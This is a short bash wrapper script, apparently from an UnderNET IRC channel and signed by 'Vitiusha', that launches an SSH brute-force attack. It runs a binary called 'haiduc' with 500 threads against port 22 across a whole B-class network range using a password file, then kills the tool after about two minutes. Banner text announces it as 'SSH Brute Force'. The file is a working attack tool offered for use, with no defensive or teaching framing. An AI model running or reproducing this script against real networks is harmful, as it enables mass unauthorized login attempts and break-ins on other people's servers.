#!/bin/bash
# UnderNET Channel #1983 | © 2010-2016
# by Vitiusha 
# 
### Set conexiuni tool ###
passfile=pass
threads=500
port=22
#
WHI='[1;37m'
BLK='[1;30m'
RED='[1;31m'
YEL='[1;33m'
BLU='[1;34m'
RES='[0m'

if [ $# != 1 ]; then
        echo "${WHI}   Folosim: $0 <b class>${RES}"
        exit;
fi
echo "${BLK}                 Made in Moldova"
echo "               SSH   Brute Force"
echo "${BLU}              ..::${RED} BY Vitiusha ${BLU}::..  "
echo "${RED}[+]${BLK} Brute Pashol ${WHI}-> ${BLU} VIVA ${YEL}LA ${RED}MOLDOVA ${YEL}"
./haiduc $threads -b $1 $passfile $port "nproc"
sleep 60
sleep 60
pkill haiduc
sleep 2
pkill haiduc
pkill haiduc
sleep 2
echo "${RED}[+]${BLK} Brutele TERMINAT.${RES}"
